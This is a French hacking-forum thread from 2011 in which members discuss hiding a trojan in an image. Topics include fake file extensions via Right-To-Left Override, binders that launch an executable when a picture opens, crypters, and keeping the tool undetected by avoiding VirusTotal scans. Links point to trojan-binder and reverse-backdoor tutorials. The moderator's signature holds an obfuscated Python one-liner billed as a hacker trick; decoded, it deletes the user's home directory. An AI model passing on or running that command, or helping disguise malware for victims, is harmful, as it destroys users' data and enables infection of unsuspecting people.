Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 08-10-2011 22:06:09

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Fichier infecté dans une image

Salut smile

Est-il possible de backdoorer une image?

En Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 08-10-2011 22:25:53

algerino
Membre d'Or
Inscription : 12-02-2010
Messages : 409

Re : Fichier infecté dans une image

oui c'est possible, regarde bien la dernière vidéo de DarkCoder de unremote.org Fake extension


Le silence est une sagesse mais rare sont ceux qui le pratiquent by Prophète Mohammed (saws)

Hors Ligne

#3 08-10-2011 23:14:05

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Fichier infecté dans une image

Merci wink ça me donne des idées big_smile

Dernière modification par koala (08-10-2011 23:14:18)

En Ligne

#4 10-10-2011 18:18:01

algerino
Membre d'Or
Inscription : 12-02-2010
Messages : 409

Re : Fichier infecté dans une image

J'ai essayé de faire comme dans la vidéo mais le problème c'est quand tu change l'extension en .jpg par exemple et que tu veux l'envoyer en pièce jointe ça ne marche pas? je cherche une technique pour contourner cela.


Le silence est une sagesse mais rare sont ceux qui le pratiquent by Prophète Mohammed (saws)

Hors Ligne

#5 10-10-2011 18:53:11

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Fichier infecté dans une image

Meme problème hmm

En Ligne

#6 10-10-2011 19:13:40

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Fichier infecté dans une image

La technique du "Right-To-Left Override" est effectivement intéressante, mais ça peut coincer pour les pièces jointes (un exécutable reste un exécutable).
Pour "intégrer" un exécutable dans une image pour qu'il se lance à l'ouverture, il faut utiliser un "binder" qui va lier les 2 fichiers et les ouvrir ensemble. La difficulté, c'est de trouver un binder suffisamment discret pour ne pas déclencher l'antivirus, presque tous les binders publics sont détectés comme "dangereux" hmm

Plus d'infos sur la technique dont vous parlez, la fausse extension :
--> J’lui ai retourné le .exe ! [korben.info]
--> File extension changing tutorial

Hors Ligne

#7 10-10-2011 21:24:07

algerino
Membre d'Or
Inscription : 12-02-2010
Messages : 409

Re : Fichier infecté dans une image

le binder peut il être utilisé lors de l'envoie de pièce jointe?


Le silence est une sagesse mais rare sont ceux qui le pratiquent by Prophète Mohammed (saws)

Hors Ligne

#8 10-10-2011 21:41:38

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Fichier infecté dans une image

Le binder sert à créer un fichier "conteneur" qui lancera plusieurs fichiers en même temps que le principal. Par exemple tu utilises le binder pour "fusionner" une image et un trojan, il va te créer un nouveau fichier qui sera une image normale (donc intégrable en pièce jointe), mais quand quelqu'un voudra ouvrir ladite image, le trojan se lancera en même temps (automatiquement).

Je n'ai jamais beaucoup joué avec des binders (faute d'en avoir trouvé un bon), mais ceci devrait être valide avec tous les binders existants.
Il y en a un ici que je n'ai pas encore eu le temps de tester
--> Binder - Hacking software to hide trojans and viruses
Pour ceux qui sont chauds-programmation (en C), voilà comment créer un binder soi-même (+ application, attention c'est du high-level)
--> Create your own trojan binder
--> Reverse SSL backdoor with socat and metasploit (and proxies)

Hors Ligne

#9 11-10-2011 10:37:22

algerino
Membre d'Or
Inscription : 12-02-2010
Messages : 409

Re : Fichier infecté dans une image

je suis prêt pour le "high level" lol et merci pour ces informations antares145 wink


Le silence est une sagesse mais rare sont ceux qui le pratiquent by Prophète Mohammed (saws)

Hors Ligne

#10 13-10-2011 00:17:58

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Fichier infecté dans une image

Mmh, ce n'est pas l'image elle même qui est infectée.

On peut faire des choses drôles en cachant du shellcode dans une image par stéganographie, pour avoir une grosse archive discrète 'sous la main'. wink et la pour le coup, c'est plus ou moins l'image qui est infectieuse.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#11 13-10-2011 13:20:34

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Fichier infecté dans une image

Merci pour ces précisions antares wink

Au passage on peut également mettre du code PHP dans une image pour ceux qui ne le savent pas mais ce qui reste vraiment intérèssant c'est bypasser les antivirus c'est sur smile

En Ligne

#12 13-10-2011 23:29:20

algerino
Membre d'Or
Inscription : 12-02-2010
Messages : 409

Re : Fichier infecté dans une image

vous savez ce qui vous reste à faire? créer votre propre binder 100% fud tongue ça serait bien qu'on realise notre propre binder made in CRACK WIFI.
Qu'en pensez vous? moi je suis partant big_smile


Le silence est une sagesse mais rare sont ceux qui le pratiquent by Prophète Mohammed (saws)

Hors Ligne

#13 14-10-2011 00:49:29

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Fichier infecté dans une image

Il ne restera pas longtemps 100% fud comme ça.

Hors Ligne

#14 14-10-2011 11:29:17

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Fichier infecté dans une image

C'est clair, on serait détecté en moins de 2

En Ligne

#15 14-10-2011 14:34:22

algerino
Membre d'Or
Inscription : 12-02-2010
Messages : 409

Re : Fichier infecté dans une image

si on scanne pas notre binder sur les sites tels que : novirusthanks ou virustotal on aura alors des chances de le garder un bon moment wink


Le silence est une sagesse mais rare sont ceux qui le pratiquent by Prophète Mohammed (saws)

Hors Ligne

#16 14-10-2011 15:28:27

Jack Sparrow
Membre Indéboulonnable
Inscription : 04-12-2010
Messages : 101

Re : Fichier infecté dans une image

algerino a écrit :

J'ai essayé de faire comme dans la vidéo mais le problème c'est quand tu change l'extension en .jpg par exemple et que tu veux l'envoyer en pièce jointe ça ne marche pas? je cherche une technique pour contourner cela.

C'est normal ^^ en fait cette astuce permet juste de "tromper l'oeil" d'un utilisateur sous windows 7...
Le fichier reste toujours un exécutable et il est détecté en tant que tel lors de l'envoi par mail ou lorsqu'on le partage par P2P.
De plus cette astuce ne fonctionne que sous windows 7, ou du moins elle ne fonctionne pas sous windows xp d'après mes tests, car il ne connait pas le caractère utilisé pour "forcer l'écriture de droite à gauche"... Donc sous xp on voit bien une extension .exe



algerino a écrit :

si on scanne pas notre binder sur les sites tels que : novirusthanks ou virustotal on aura alors des chances de le garder un bon moment wink

Ca se tente.. ^^
Toto s'y connait déjà pas mal en codage de crypteur apparemment, il en a déjà parlé dans ce topic wink

Dernière modification par Jack Sparrow (14-10-2011 15:29:06)

Hors Ligne

#17 14-10-2011 18:05:14

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Fichier infecté dans une image

J'ai déga un crypteur sous la main si ça intérèsse wink

En Ligne

#18 14-10-2011 22:08:34

algerino
Membre d'Or
Inscription : 12-02-2010
Messages : 409

Re : Fichier infecté dans une image

moi je veux un binder pas un crypter lol


Le silence est une sagesse mais rare sont ceux qui le pratiquent by Prophète Mohammed (saws)

Hors Ligne

#19 15-10-2011 20:01:54

toto
Membre V.I.P.
Lieu : chez le docteur aussi
Inscription : 15-01-2011
Messages : 221

Re : Fichier infecté dans une image

un binder de jpg qui lance un exe c facile a faire et indétectable il faut juste un peu de code smile et de l'imagination !!!

je vous donne pas l'astuce parce-que j'en ai plus rien a faire de la S I bonne continuation a vous ..

Hors Ligne

#20 15-10-2011 23:55:33

algerino
Membre d'Or
Inscription : 12-02-2010
Messages : 409

Re : Fichier infecté dans une image

toto a dit :

je vous donne pas l'astuce parce-que j'en ai plus rien a faire de la S I bonne continuation a vous

SI? donne nous quelques pistes tongue

un binder de jpg qui lance un exe c facile a faire et indétectable il faut juste un peu de code smile et de l'imagination

Si c'est simple à faire un binder indétectable, pourquoi ne pas partager ton imagination avec la communauté crack-wifi? hmm

Dernière modification par algerino (15-10-2011 23:56:08)


Le silence est une sagesse mais rare sont ceux qui le pratiquent by Prophète Mohammed (saws)

Hors Ligne

#21 16-10-2011 10:50:02

toto
Membre V.I.P.
Lieu : chez le docteur aussi
Inscription : 15-01-2011
Messages : 221

Re : Fichier infecté dans une image

algerino a écrit :

pourquoi ne pas partager ton imagination avec la communauté crack-wifi?

Because j'ai pas le temps en ce moment de retrouver mes sources qui son sur un disque dur démonté et de vous faire un tuto mais promis dés que j'ai refait mon "labo" je vous envoie un indice ou mieux

Hors Ligne

#22 04-11-2011 15:23:51

evilcode
N00b
Inscription : 17-02-2010
Messages : 4

Re : Fichier infecté dans une image

toto

J'attends avec impatience de voir tes tuto smile)


Hack To Learn, Not Learn To Hack !

Hors Ligne

#23 05-11-2011 21:50:02

toto
Membre V.I.P.
Lieu : chez le docteur aussi
Inscription : 15-01-2011
Messages : 221

Re : Fichier infecté dans une image

arf je ne fait plus de tuto j'essaie de revenir a des choses plus terre a terre wink

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.035 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]